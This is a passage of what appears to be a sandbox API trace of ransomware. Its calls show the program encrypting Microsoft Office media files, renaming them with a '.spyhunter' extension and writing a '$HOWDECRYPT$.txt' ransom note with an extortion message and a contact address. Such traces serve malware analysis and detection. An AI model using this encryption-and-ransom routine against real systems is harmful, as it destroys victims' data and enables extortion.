lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fb04*=0x8ac, lpOverlapped=0x0) returned 1 [0100.768] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffff754, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0100.768] WriteFile (in: hFile=0xf0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x8ac, lpNumberOfBytesWritten=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fb04*=0x8ac, lpOverlapped=0x0) returned 1 [0100.769] GetProcessHeap () returned 0x2c0000 [0100.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0100.769] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0100.769] WriteFile (in: hFile=0xf0, lpBuffer=0x57fb44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x57fb44*, lpNumberOfBytesWritten=0x57fb04*=0x4, lpOverlapped=0x0) returned 1 [0100.769] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fb04, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fb04*=0x30, lpOverlapped=0x0) returned 1 [0100.769] CloseHandle (hObject=0xf0) returned 1 [0100.769] GetProcessHeap () returned 0x2c0000 [0100.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0100.769] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF.spyhunter") returned 84 [0100.769] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18256_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\AUTOSHAP\\BD18256_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\autoshap\\bd18256_.wmf.spyhunter")) returned 1 [0100.770] GetProcessHeap () returned 0x2c0000 [0100.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0100.770] GetProcessHeap () returned 0x2c0000 [0100.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0100.770] GetProcessHeap () returned 0x2c0000 [0100.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8390 | out: hHeap=0x2c0000) returned 1 [0100.770] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb40 | out: pbBuffer=0x57fb40) returned 1 [0100.770] GetProcessHeap () returned 0x2c0000 [0100.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0100.771] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb38*=0x30) returned 1 [0100.771] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14582_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0101.047] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF") returned 73 [0101.047] StrStrW (lpFirst="BD14582_.GIF", lpSrch=".txt") returned 0x0 [0101.055] GetProcessHeap () returned 0x2c0000 [0101.055] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0101.055] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57fafc*=0xb9, lpOverlapped=0x0) returned 1 [0101.056] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff47, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.056] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xb9, lpNumberOfBytesWritten=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57fafc*=0xb9, lpOverlapped=0x0) returned 1 [0101.056] GetProcessHeap () returned 0x2c0000 [0101.056] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0101.057] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.057] WriteFile (in: hFile=0xec, lpBuffer=0x57fb3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x57fb3c*, lpNumberOfBytesWritten=0x57fafc*=0x4, lpOverlapped=0x0) returned 1 [0101.057] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fafc*=0x30, lpOverlapped=0x0) returned 1 [0101.057] CloseHandle (hObject=0xec) returned 1 [0101.158] GetProcessHeap () returned 0x2c0000 [0101.158] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cd6318 [0101.159] wnsprintfW (in: pszDest=0x2cd6318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF.spyhunter") returned 83 [0101.159] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14582_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD14582_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd14582_.gif.spyhunter")) returned 1 [0101.241] GetProcessHeap () returned 0x2c0000 [0101.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cd6318 | out: hHeap=0x2c0000) returned 1 [0101.241] GetProcessHeap () returned 0x2c0000 [0101.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0101.241] GetProcessHeap () returned 0x2c0000 [0101.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3af768 | out: hHeap=0x2c0000) returned 1 [0101.242] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb40 | out: pbBuffer=0x57fb40) returned 1 [0101.242] GetProcessHeap () returned 0x2c0000 [0101.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0101.242] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb38*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb38*=0x30) returned 1 [0101.242] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115868.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.826] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF") returned 73 [0101.826] StrStrW (lpFirst="J0115868.GIF", lpSrch=".txt") returned 0x0 [0101.826] GetProcessHeap () returned 0x2c0000 [0101.826] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.826] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57fafc*=0xe0, lpOverlapped=0x0) returned 1 [0101.827] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.827] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57fafc*=0xe0, lpOverlapped=0x0) returned 1 [0101.828] GetProcessHeap () returned 0x2c0000 [0101.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.828] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.828] WriteFile (in: hFile=0x170, lpBuffer=0x57fb3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x57fb3c*, lpNumberOfBytesWritten=0x57fafc*=0x4, lpOverlapped=0x0) returned 1 [0101.828] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57fafc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57fafc*=0x30, lpOverlapped=0x0) returned 1 [0101.828] CloseHandle (hObject=0x170) returned 1 [0101.828] GetProcessHeap () returned 0x2c0000 [0101.828] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0101.829] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF.spyhunter") returned 83 [0101.829] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115868.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\J0115868.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\j0115868.gif.spyhunter")) returned 1 [0101.830] GetProcessHeap () returned 0x2c0000 [0101.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0101.830] GetProcessHeap () returned 0x2c0000 [0101.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0101.830] GetProcessHeap () returned 0x2c0000 [0101.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf7540 | out: hHeap=0x2c0000) returned 1 [0101.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.838] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0101.838] WriteFile (in: hFile=0x170, lpBuffer=0x57fa6f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fb98, lpOverlapped=0x0 | out: lpBuffer=0x57fa6f*, lpNumberOfBytesWritten=0x57fb98*=0x127, lpOverlapped=0x0) returned 1 [0101.839] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0101.839] WriteFile (in: hFile=0x170, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fb98, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fb98*=0x2ac, lpOverlapped=0x0) returned 1 [0101.839] CloseHandle (hObject=0x170) returned 1 [0101.839] GetProcessHeap () returned 0x2c0000 [0101.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0101.839] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb38 | out: pbBuffer=0x57fb38) returned 1 [0101.839] GetProcessHeap () returned 0x2c0000 [0101.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0101.839] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb30*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb30*=0x30) returned 1 [0101.839] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21535_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0101.840] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF") returned 73 [0101.840] StrStrW (lpFirst="BD21535_.GIF", lpSrch=".txt") returned 0x0 [0101.840] GetProcessHeap () returned 0x2c0000 [0101.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0101.840] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57faf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57faf4*=0x12b, lpOverlapped=0x0) returned 1 [0101.939] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffed5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.939] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x12b, lpNumberOfBytesWritten=0x57faf4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57faf4*=0x12b, lpOverlapped=0x0) returned 1 [0101.939] GetProcessHeap () returned 0x2c0000 [0101.939] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0101.939] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.939] WriteFile (in: hFile=0x170, lpBuffer=0x57fb34*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57faf4, lpOverlapped=0x0 | out: lpBuffer=0x57fb34*, lpNumberOfBytesWritten=0x57faf4*=0x4, lpOverlapped=0x0) returned 1 [0101.939] WriteFile (in: hFile=0x170, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57faf4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57faf4*=0x30, lpOverlapped=0x0) returned 1 [0101.939] CloseHandle (hObject=0x170) returned 1 [0102.476] GetProcessHeap () returned 0x2c0000 [0102.476] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.476] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF.spyhunter") returned 83 [0102.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21535_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21535_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21535_.gif.spyhunter")) returned 1 [0102.476] GetProcessHeap () returned 0x2c0000 [0102.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.476] GetProcessHeap () returned 0x2c0000 [0102.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0102.476] GetProcessHeap () returned 0x2c0000 [0102.476] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf6740 | out: hHeap=0x2c0000) returned 1 [0102.477] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb30 | out: pbBuffer=0x57fb30) returned 1 [0102.477] GetProcessHeap () returned 0x2c0000 [0102.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0102.477] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb28*=0x30) returned 1 [0102.477] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21333_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0102.487] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF") returned 73 [0102.487] StrStrW (lpFirst="BD21333_.GIF", lpSrch=".txt") returned 0x0 [0102.487] GetProcessHeap () returned 0x2c0000 [0102.487] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.487] ReadFile (in: hFile=0xf0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x57faec*=0x1a0, lpOverlapped=0x0) returned 1 [0102.488] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffe60, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.488] WriteFile (in: hFile=0xf0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1a0, lpNumberOfBytesWritten=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x57faec*=0x1a0, lpOverlapped=0x0) returned 1 [0102.488] GetProcessHeap () returned 0x2c0000 [0102.488] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.488] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.488] WriteFile (in: hFile=0xf0, lpBuffer=0x57fb2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x57fb2c*, lpNumberOfBytesWritten=0x57faec*=0x4, lpOverlapped=0x0) returned 1 [0102.489] WriteFile (in: hFile=0xf0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57faec*=0x30, lpOverlapped=0x0) returned 1 [0102.490] CloseHandle (hObject=0xf0) returned 1 [0102.490] GetProcessHeap () returned 0x2c0000 [0102.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.490] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF.spyhunter") returned 83 [0102.490] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21333_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21333_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21333_.gif.spyhunter")) returned 1 [0102.490] GetProcessHeap () returned 0x2c0000 [0102.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.490] GetProcessHeap () returned 0x2c0000 [0102.490] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0102.490] GetProcessHeap () returned 0x2c0000 [0102.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a700 | out: hHeap=0x2c0000) returned 1 [0102.491] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb30 | out: pbBuffer=0x57fb30) returned 1 [0102.491] GetProcessHeap () returned 0x2c0000 [0102.491] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0102.491] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fb28*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fb28*=0x30) returned 1 [0102.491] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15184_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0102.540] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF") returned 71 [0102.540] StrStrW (lpFirst="BD15184_.GIF", lpSrch=".txt") returned 0x0 [0102.541] GetProcessHeap () returned 0x2c0000 [0102.541] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0102.541] ReadFile (in: hFile=0x158, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57faec*=0x482, lpOverlapped=0x0) returned 1 [0102.549] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb7e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.549] WriteFile (in: hFile=0x158, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x482, lpNumberOfBytesWritten=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57faec*=0x482, lpOverlapped=0x0) returned 1 [0102.549] GetProcessHeap () returned 0x2c0000 [0102.549] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0102.549] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.549] WriteFile (in: hFile=0x158, lpBuffer=0x57fb2c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x57fb2c*, lpNumberOfBytesWritten=0x57faec*=0x4, lpOverlapped=0x0) returned 1 [0102.550] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57faec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x57faec*=0x30, lpOverlapped=0x0) returned 1 [0102.550] CloseHandle (hObject=0x158) returned 1 [0102.550] GetProcessHeap () returned 0x2c0000 [0102.550] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c961f8 [0102.551] wnsprintfW (in: pszDest=0x2c961f8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF.spyhunter") returned 81 [0102.551] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15184_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15184_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15184_.gif.spyhunter")) returned 1 [0102.706] GetProcessHeap () returned 0x2c0000 [0102.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c961f8 | out: hHeap=0x2c0000) returned 1 [0102.706] GetProcessHeap () returned 0x2c0000 [0102.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0102.706] GetProcessHeap () returned 0x2c0000 [0102.706] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c18480 | out: hHeap=0x2c0000) returned 1 [0102.707] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fb28 | out: pbBuffer=0x57fb28) returned 1 [0102.707] GetProcessHeap () returned 0x2c0000 [0102.707] RtlAllocateHeap 